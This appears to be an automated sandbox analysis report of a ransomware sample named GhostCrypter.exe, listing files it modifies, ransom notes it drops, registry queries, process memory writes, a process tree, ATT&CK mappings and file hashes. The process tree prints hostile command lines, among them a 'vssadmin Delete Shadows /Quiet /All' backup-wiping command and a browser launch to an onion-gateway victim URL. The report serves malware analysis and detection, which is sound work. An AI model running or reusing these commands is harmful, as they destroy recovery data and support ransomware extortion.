File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\logo.scale-200_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-white\AppListIcon.scale-400.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_systemresource-wind..-ui-accountscontrol_31bf3856ad364e35_10.0.19041.1_none_8805ef3af31f4b8c\Advanced.Theme-Light_Scale-100.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft.powershell.pester_31bf3856ad364e35_10.0.19041.1_none_9478227a478f23d5\BeLikeExactly.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_b7b899e4fb8201d1\SqlPersistenceService_Logic.sql	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.153_none_47569e595c44e70c\Folder_Large.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleLogo.targetsize-20_altform-unplated.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_windowssearchengine_31bf3856ad364e35_7.0.19041.264_none_8bd2f5fc0c992e06\idxcntrs.h	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-h..indetails.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_e3685f97b198e2df\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\Wide310x150Logo.contrast-black_scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\accessibility.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.contrast-black_scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.173_none_6486f23c2831aaf3\InputApp\Assets\SquareLogo150x150.scale-100.png	GhostCrypter.exe
File created	C:\Windows\SystemResources\Windows.ShellCommon.SharedResources\Images\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\ImmersiveControlPanel\images\RestrictBackgroundData.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\splashscreen.scale-200.png	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ie-internetexplorer_31bf3856ad364e35_11.0.19041.1_none_194488652435e51b\Windows Navigation Start.wav	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\square150x150logo.scale-125.png	GhostCrypter.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.19041.264_none_aa5417fd2708544d\readme_liesmich_encryptor_raas.txt	GhostCrypter.exe
File opened for modification	C:\Windows\diagnostics\system\Search\TS_ProtocolHostCrashing.ps1	GhostCrypter.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\GameSystemToastIcon.png	GhostCrypter.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2624	msedge.exe
2624	msedge.exe
1740	msedge.exe
1740	msedge.exe
3640	identity_helper.exe
3640	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe
1740	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 440 wrote to memory of 4512	440	GhostCrypter.exe	99
PID 440 wrote to memory of 4512	440	GhostCrypter.exe	99
PID 440 wrote to memory of 4512	440	GhostCrypter.exe	99
PID 440 wrote to memory of 1740	440	GhostCrypter.exe	101
PID 440 wrote to memory of 1740	440	GhostCrypter.exe	101
PID 1740 wrote to memory of 4808	1740	msedge.exe	102
PID 1740 wrote to memory of 4808	1740	msedge.exe	102
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 4676	1740	msedge.exe	103
PID 1740 wrote to memory of 2624	1740	msedge.exe	104
PID 1740 wrote to memory of 2624	1740	msedge.exe	104
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105
PID 1740 wrote to memory of 4332	1740	msedge.exe	105

C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All
  2⤵
  PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://idxcgov7x3dl552g.onion.link/vict?cust=8075ffe0db3cded725bdb4f67cc450bb834965a6&guid=d1f2fdfb-e063-43be-88aa-b9b0326295b4&ever=2016-04-04_2&wver=0a00614a4336&fc=3289
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbfe1246f8,0x7ffbfe124708,0x7ffbfe124718
    3⤵
    PID:4808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:4676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
    3⤵
    PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:1284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:2024
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
    3⤵
    PID:3764
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
    3⤵
    PID:4540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
    3⤵
    PID:1036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
    3⤵
    PID:2192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
    3⤵
    PID:1996
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
    3⤵
    PID:2288
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
    3⤵
    PID:4080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,13801717673432084210,10364444137473211249,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
    3⤵
    PID:2156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\manifest.json

Filesize
408B

MD5
4c9bccdcde929832d9ceffe0961122e2

SHA1
6f4b5c58cfba211f08d7a3c075165fca3e4692b0

SHA256
d3a32ca5e618f7c51d20e9571587df1c17b8bbc8553faaab5f1086ee21de9052

SHA512
9b84890db57a3f32aac4cf0f267d10cbac0300e38aa6763df2c535fd3eef958ff850094207c16b3b993bce383ba79f6dc7e90b222c7253ac24bd4d923a8e5c01

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\manifest.json

Filesize
1KB

MD5
c65ef052e27b853ad854fcb7d357b824

SHA1
fafb9df43244cb0aa578bc1da5acfed6ae13a0e4

SHA256
87092af1043c7bb1ace029e6a9ec97acea215bf200c449dd44cb0afa1a4939ac

SHA512
f87be53abf9fbb141012d9e7bb0398726cff400140921039dde4966550ef71520f2aa76fabdea3ce324044be71bc29f07971769f107d7ec978c28cf11b003ac0

Download Submit
C:\Program Files\Common Files\microsoft shared\ink\readme_liesmich_encryptor_raas.txt

Filesize
1KB

MD5
2fff533b1a751feeeefb6705b9ea0d1d

SHA1
c8af6085f3e33c16d727681efc60d49d5135623e

SHA256
ccabe8bd91fe487b15ed179a4bb9a3c16ac79007df3fa8bae5a7674518ce4ed0

SHA512
fc5f8eae8f87a5e763b9e43c2dfb3503da794678fe66668feb2a2a0ad10cb23295855323277490783e5f3ba4093c52ab48087e35f1bbee794ecfe4243ca28a48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9f44d6f922f830d04d7463189045a5a3

SHA1
2e9ae7188ab8f88078e83ba7f42a11a2c421cb1c

SHA256
0ae5cf8b49bc34fafe9f86734c8121b631bad52a1424c1dd2caa05781032334a

SHA512
7c1825eaefcc7b97bae31eeff031899300b175222de14000283e296e9b44680c8b3885a4ed5d78fd8dfee93333cd7289347b95a62bf11f751c4ca47772cf987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7740a919423ddc469647f8fdd981324d

SHA1
c1bc3f834507e4940a0b7594e34c4b83bbea7cda

SHA256
bdd4adaa418d40558ab033ac0005fd6c2312d5f1f7fdf8b0e186fe1d65d78221

SHA512
7ad98d5d089808d9a707d577e76e809a223d3007778a672734d0a607c2c3ac5f93bc72adb6e6c7f878a577d3a1e69a16d0cd871eb6f58b8d88e2ea25f77d87b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old

Filesize
568B

MD5
e33bd9f826625340c8bced6a1845ab64

SHA1
5a4a21ba55fc80a0305f990d91d600636ba8148e

SHA256
a94ba116d4e0341a52cfedefb4c2200f7980e88ba3d82fd7c1f7938743a15c93

SHA512
b0b0a0fb0507d6a2fe3746c4066fbb9ad9e5c5d3eac0ab5209766c1d4344725eb84cf92ad07c08b621a75b659b79398903de82df89f611aa1b16ba7b34715251

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dc4fd77dc1feaa7c3ca1fbc27dd5238d

SHA1
d9ab90d882cd72f889946067143375e2b0b323a3

SHA256
7aa301732ff44baf73ebbd0dc6c8f10456ee1b6bbdd9fa51fe925f8fec31a2f9

SHA512
0d5594fae12ef3ebd330a8a3f1b692540ae8e23a80e8fa5509dd92f8b33d9870a151ac125108f71f6a5a85c177d2f16e892eb09f4afa3e760d6c1f9fc434f778

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c9b4dff4ef695e11c699b386358454d7

SHA1
f2011f5ebda0fe26878744006c335155955db18c

SHA256
9e5d3015dc98859643b2e0b0d06b31a35d28c84684f033b158d073180a8cdd6d

SHA512
dd0a5ec11a050766b6ec9a186dab3e61f78c849127b2885acae8e5e4300db049ad6753a835016d76ea5789fca298fe7dfa7401dc6421e1427b094a65c928ddfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old

Filesize
584B

MD5
84b9675838509b8fef8d2f3410873a80

SHA1
1aedb6b42ce21d739f4b0d0bbc862aa2e9acd211

SHA256
90f0ee39208f367efeb5b7f454190d5f27b4e86a73bc1001e6676fb8e852b6da

SHA512
293188d315a8eda34f926a83f5831ff8116cbfdccfd3da559db92a7e28c84e2ba24e88313d6d5810597bc0502753a4f584d196d380512a6be012ac0f717a1e80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old

Filesize
552B

MD5
661e4b3fea249387c8838104559f247d

SHA1
dbe19e4d15b58fc1bf85eef18082ecde3377a6f1

SHA256
9c8a579737ebfeb740876cc96299bd85314db3ba4a90e3f50ce47fec1e316977

SHA512
fe341abeba9f7a3fb1ae182bcae70d3bca2b149d8fa45e20a75b75af4bf726795abd72c5d79ec8d8bd1c551eec875e126c468978123b3922402c76f2c10c7060

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
85a7e065361e653db50049f473d18206

SHA1
efed7d778a4696994cf1ea972e98b02c28ee49a4

SHA256
a65b47333f8980223d6d3b847857d107abe00edc59d436c6b8877be024ccf63e

SHA512
689fafe1de2fec6a07ddffc05362fab1b8acd6ccfa604146fe162d30c30b0b8f7328e6b1de6f3daf5abb44526fdbe79af1dea72c0f1c4bb1aaf781e12d94e1cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
280B

MD5
62f0c9d9a82735db6b20845ee24e3949

SHA1
499941abcf6da7cb97536c4bfef5d44fb9353503

SHA256
b809d0a066f9ac644fc2ddd1cec5cbedf2721188626a27274b60db8c90736e7b

SHA512
63a221ec7e76870672c4d665dc6fc8e896445112aac01f7d3ad76c806095ffc22dced8172b9e1cc7b29f6dcf7480946dd22c8bb31e9ce0c46d4f2e233fc50845

Download Submit
memory/440-111-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-4197-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-4022-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-3385-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-3202-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-2092-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-1999-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/440-210-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download